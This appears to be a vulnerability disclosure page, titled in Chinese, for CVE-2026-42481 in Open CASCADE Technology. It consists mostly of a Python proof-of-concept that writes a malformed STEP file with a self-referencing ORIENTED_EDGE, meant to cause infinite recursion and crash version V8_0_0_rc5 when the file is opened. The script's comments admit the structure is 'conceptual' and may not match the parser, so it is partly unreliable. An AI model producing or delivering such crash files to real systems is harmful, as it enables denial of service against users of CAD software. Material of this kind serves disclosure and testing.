CVE-2026-42481 Open CASCADE越界读取及无限递归漏洞

import os # PoC for CVE-2026-42481: Open CASCADE Technology OCCT V8_0_0_rc5 Vulnerability # This script generates a malformed STEP file designed to trigger # infinite recursion in StepShape_OrientedEdge::EdgeStart # by creating a self-referential structure. malicious_step_content = """ISO-10303-21; HEADER; FILE_DESCRIPTION(('Open CASCADE Model'),'2;1'); FILE_NAME('exploit.step','2026-05-01',('Author'),('Organization'),'PreProcessor','Originating System','Authorization'); FILE_SCHEMA(('AUTOMOTIVE_DESIGN { 1 0 10303 214 1 1 1 1 }')); ENDSEC; DATA; /* Attempt to trigger infinite recursion via self-referential edge */ #1=CARTESIAN_POINT('',(0.E0,0.E0,0.E0)); #2=VERTEX_POINT('',#1); /* Self-referential definition attempt (Conceptual) */ /* In a real exploit, the specific entity IDs and structure would match the parser's logic */ #3=ORIENTED_EDGE('',*,*,#3,.T.); #4=EDGE_LOOP('',(#3)); #5=FACE_BOUND('',#4,.T.); ENDSEC; END-ISO-10303-21; """ def generate_poc(filename="cve_2026_42481_poc.step"): with open(filename, "w") as f: f.write(malicious_step_content) print(f"POC file generated: {filename}") print("Open this file with Open CASCADE Technology V8_0_0_rc5 to trigger the crash.") if __name__ == "__main__": generate_poc()